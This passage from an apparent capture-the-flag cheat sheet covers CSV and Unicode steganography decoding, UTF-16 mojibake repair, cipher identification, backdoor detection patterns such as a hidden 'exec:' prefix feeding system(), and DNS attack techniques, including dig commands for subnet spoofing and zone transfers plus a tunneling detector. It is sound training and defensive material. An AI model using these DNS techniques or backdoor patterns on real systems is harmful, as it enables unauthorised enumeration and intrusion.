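SAMPLE_CSV = """Title,Times Borrowed,Year
Dune,102,1965
Emma,108,1815
Ulysses,97,1922
Beloved,103,1987
Hamlet,123,1603
Walden,99,1854
Persuasion,115,1817
Dracula,118,1897
Candide,125,1759
"""


def ascii_columns(text, low=32, high=126):
    """Names of columns whose every value is an integer within [low, high]."""
    rows = list(csv.DictReader(io.StringIO(text)))
    hits = []
    for column in rows[0].keys():
        try:
            values = [int(row[column]) for row in rows]
        except ValueError:
            continue  # non-numeric column
        if values and all(low <= v <= high for v in values):
            hits.append(column)
    return hits


def decode_column(text, column):
    """The page's one-liner for a chosen column (equivalent to CyberChef's From Decimal)."""
    return ''.join(chr(int(row[column])) for row in csv.DictReader(io.StringIO(text)))


if __name__ == '__main__':
    for column in ascii_columns(SAMPLE_CSV):
        print(column, '->', decode_column(SAMPLE_CSV, column))
```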
## Backdoor Detection in Source Code

Pattern (Rear Hatch): Hidden command prefix triggers `system()` call.

Common patterns:
- `strncmp(input, "exec:", 5)` -> runs `system(input + 5)`
- Hex-encoded comparison strings: `\x65\x78\x65\x63\x3a` = "exec:"
- Hidden conditions in maintenance/admin functions
## DNS Exploitation Techniques

See dns.md for full details (ECS spoofing, NSEC walking, IXFR, rebinding, tunneling).

Quick reference:
- ECS spoofing: `dig @server flag.example.com TXT +subnet=10.13.37.1/24` - try leet-speak IPs (1337)
- NSEC walking: Follow NSEC chain to enumerate DNSSEC zones
- IXFR: `dig @server domain IXFR=0` when AXFR is blocked
- DNS rebinding: Low-TTL alternating resolution to bypass same-origin
- DNS tunneling: Data exfiltrated via subdomain queries or TXT responses
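The tunneling entry seen from the defender's side, as an added example (not dns.md's or the page's code): a detector over a constructed query log that groups names by registered domain and flags domains receiving many distinct, long, high-entropy leftmost labels, the signature of data leaving through subdomain queries. The registered-domain rule (last two labels) is a simplification; a real deployment would use the public suffix list. The thresholds are assumptions to tune per environment.

```python
import hashlib, math
from collections import defaultdict


def shannon_entropy(s):
    """Bits per character; hex or base32 chunks score well above ordinary hostnames."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def registered_domain(name):
    """Last two labels (assumption; use the public suffix list for co.uk-style domains)."""
    return '.'.join(name.rstrip('.').split('.')[-2:])


def tunnel_candidates(queries, min_unique=5, min_label_len=20, min_entropy=3.0):
    """Per registered domain, count distinct leftmost labels that are long and high-entropy;
    returns sorted (domain, count) for domains over the min_unique threshold."""
    by_domain = defaultdict(set)
    for q in queries:
        labels = q.rstrip('.').split('.')
        if len(labels) > 2:
            by_domain[registered_domain(q)].add(labels[0])
    flagged = []
    for domain, labels in by_domain.items():
        suspicious = [l for l in labels if len(l) >= min_label_len and shannon_entropy(l) >= min_entropy]
        if len(suspicious) >= min_unique:
            flagged.append((domain, len(suspicious)))
    return sorted(flagged)


# Constructed query log: ordinary lookups plus six hex-chunk exfil queries
SAMPLE_QUERIES = ['www.example.com', 'mail.example.com', 'www.example.com', 'api.example.com'] + [
    hashlib.sha256(str(i).encode()).hexdigest()[:40] + '.t.exfil-example.net' for i in range(6)
]

if __name__ == '__main__':
    print(tunnel_candidates(SAMPLE_QUERIES))
```

TXT-response tunnels need the mirror-image check on answer sizes rather than query labels; the grouping and entropy pieces are the same.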
## Unicode Steganography

### Variation Selectors (U+FE00-U+FE0F)

Pattern (Seen, Nullcon 2026): Zero-width variation selectors carry data through codepoint values.

```python
# Extract hidden data from variation selectors after visible emoji
data = open('README.md', 'r', encoding='utf-8').read().strip()
hidden = data[1:]  # Skip visible emoji character
flag = ''.join(chr((ord(c) - 0xE0100) + 16) for c in hidden)
print(flag)
```

### Variation Selectors Supplement (U+E0100-U+E01EF)

Pattern (emoji, Nullcon 2026): Characters from Variation Selectors Supplement encode ASCII.

```python
# Formula: ASCII value = (codepoint - 0xE0100) + 16
flag = ''
for c in hidden_chars:  # hidden_chars: the invisible selector characters pulled from the file
    val = (ord(c) - 0xE0100) + 16
    flag += chr(val)
print(flag)
```

**Detection:** Characters appear invisible but have non-zero length. Check with `[hex(ord(c)) for c in text]` -- look for codepoints in `0xE0100-0xE01EF` or `0xFE00-0xFE0F` range.
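Both ranges and the detection check above in one place, as an added example (not the challenge's or the page's code). It generalises the page's formula to the common byte-to-selector scheme it is an instance of: values 0-15 map to U+FE00..U+FE0F and 16-255 to U+E0100..U+E01EF, so `(codepoint - 0xE0100) + 16` recovers the byte for the supplement range and `codepoint - 0xFE00` for the basic range. The carrier text is constructed from an emoji and an encoded flag.

```python
def encode_as_selectors(data):
    """Map each byte to a variation selector: 0-15 -> U+FE00..U+FE0F, 16-255 -> U+E0100..U+E01EF."""
    return ''.join(chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16) for b in data)


def decode_selectors(text):
    """Inverse mapping; every non-selector character (the visible emoji, normal text) is skipped."""
    out = bytearray()
    for ch in text:
        cp = ord(ch)
        if 0xFE00 <= cp <= 0xFE0F:
            out.append(cp - 0xFE00)
        elif 0xE0100 <= cp <= 0xE01EF:
            out.append(cp - 0xE0100 + 16)  # the page's formula
    return bytes(out)


def find_selectors(text):
    """Detection: positions and codepoints of invisible selector characters in a string."""
    return [(i, hex(ord(ch))) for i, ch in enumerate(text)
            if 0xFE00 <= ord(ch) <= 0xFE0F or 0xE0100 <= ord(ch) <= 0xE01EF]


# Constructed carrier: renders as a single emoji but is nine codepoints long
SAMPLE_TEXT = '\U0001F600' + encode_as_selectors(b'flag{vs}')

if __name__ == '__main__':
    print(len(SAMPLE_TEXT), find_selectors(SAMPLE_TEXT))
    print(decode_selectors(SAMPLE_TEXT))
```

A length check alone (`len(text)` much larger than what is visible) is the cheapest tell when reviewing READMEs, commit messages or chat input for this kind of payload.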
## UTF-16 Endianness Reversal

Pattern (endians): Text "turned to Japanese" -- mojibake from UTF-16 endianness mismatch.

```python
# If encoded as UTF-16-LE but decoded as UTF-16-BE:
fixed = mojibake.encode('utf-16-be').decode('utf-16-le')
```

**Identification:** CJK characters, challenge mentions "translation" or "endian". See [encodings.md](encodings.md) for details.
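The one-liner above plus the identification heuristic, as an added example (not the page's code): `garble` shows how the mojibake arises (ASCII written as UTF-16-LE, read as UTF-16-BE lands every character in the CJK block), and `auto_fix` applies the swap only when the text is mostly CJK and the swapped result is printable ASCII, so genuine CJK text is left alone. The sample string and the CJK block list are constructed assumptions.

```python
CJK_RANGES = ((0x3000, 0x30FF), (0x4E00, 0x9FFF), (0xAC00, 0xD7AF), (0xFF00, 0xFFEF))


def garble(text):
    """How the mojibake arises: bytes written as UTF-16-LE, read back as UTF-16-BE."""
    return text.encode('utf-16-le').decode('utf-16-be')


def fix_endianness(mojibake):
    """The page's repair: re-encode with the wrong order, decode with the right one."""
    return mojibake.encode('utf-16-be').decode('utf-16-le')


def cjk_ratio(text):
    """Fraction of characters inside the CJK blocks listed above."""
    hits = sum(any(lo <= ord(c) <= hi for lo, hi in CJK_RANGES) for c in text)
    return hits / max(len(text), 1)


def auto_fix(text, threshold=0.8):
    """Return the repaired text when it looks like swapped ASCII, else None."""
    if cjk_ratio(text) < threshold:
        return None
    try:
        swapped = fix_endianness(text)
    except UnicodeError:  # swapped pairs of real CJK text can form lone surrogates
        return None
    return swapped if swapped.isascii() and swapped.isprintable() else None


if __name__ == '__main__':
    broken = garble('flag{endian}')
    print(broken, cjk_ratio(broken), auto_fix(broken))
```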
## Cipher Identification Workflow

- ROT13 - Challenge mentions "ROT", text looks like garbled English
- Base64 - `A-Za-z0-9+/=`, title hints "64"
- Base32 - `A-Z2-7=` uppercase only
- Atbash - Title hints (Abash/Atbash), preserves spaces, 1:1 substitution
- Pigpen - Geometric symbols on grid
- Keyboard Shift - Text looks like adjacent keys pressed
- Substitution - Frequency analysis applicable

Auto-identify: dCode Cipher Identifier
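The charset rules from this workflow and from the "Identify by charset" list in Common Encodings, as one added triage function (not dCode's or the page's code): each candidate scheme is tried only when its charset and length rule match, a decoding is kept only when it yields printable text, and ROT13/Atbash candidates are offered for letter-heavy input. Hex is also valid Base64 text, which is why the decode-and-check step matters. Samples are constructed in the block.

```python
import base64, binascii, re, string

_ROT13 = str.maketrans(string.ascii_letters,
                       string.ascii_lowercase[13:] + string.ascii_lowercase[:13]
                       + string.ascii_uppercase[13:] + string.ascii_uppercase[:13])
_ATBASH = str.maketrans(string.ascii_letters,
                        string.ascii_lowercase[::-1] + string.ascii_uppercase[::-1])


def _printable(data):
    """ASCII-decode bytes and return the text only if it is all printable."""
    try:
        text = data.decode('ascii')
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def identify(text):
    """Return {scheme: plaintext} for every scheme whose charset matches and decodes to text."""
    text = text.strip()
    found = {}
    if re.fullmatch(r'[0-9a-fA-F]+', text) and len(text) % 2 == 0:
        plain = _printable(bytes.fromhex(text))
        if plain:
            found['hex'] = plain
    if re.fullmatch(r'[A-Z2-7]+=*', text) and len(text) % 8 == 0:  # uppercase only
        try:
            plain = _printable(base64.b32decode(text))
        except binascii.Error:
            plain = None
        if plain:
            found['base32'] = plain
    if re.fullmatch(r'[A-Za-z0-9+/]+=*', text) and len(text) % 4 == 0:
        try:
            plain = _printable(base64.b64decode(text))
        except binascii.Error:
            plain = None
        if plain:
            found['base64'] = plain
    letters = sum(c.isalpha() for c in text)
    if letters and letters >= len(text) / 2:  # garbled English: offer the two 1:1 substitutions
        found['rot13'] = text.translate(_ROT13)
        found['atbash'] = text.translate(_ATBASH)
    return found


# Constructed samples
SAMPLE_B64 = base64.b64encode(b'flag{b64}').decode()
SAMPLE_B32 = base64.b32encode(b'flag').decode()

if __name__ == '__main__':
    for sample in (SAMPLE_B64, SAMPLE_B32, '666c6167', 'synt{ebg13}', 'uozt'):
        print(sample, '->', identify(sample))
```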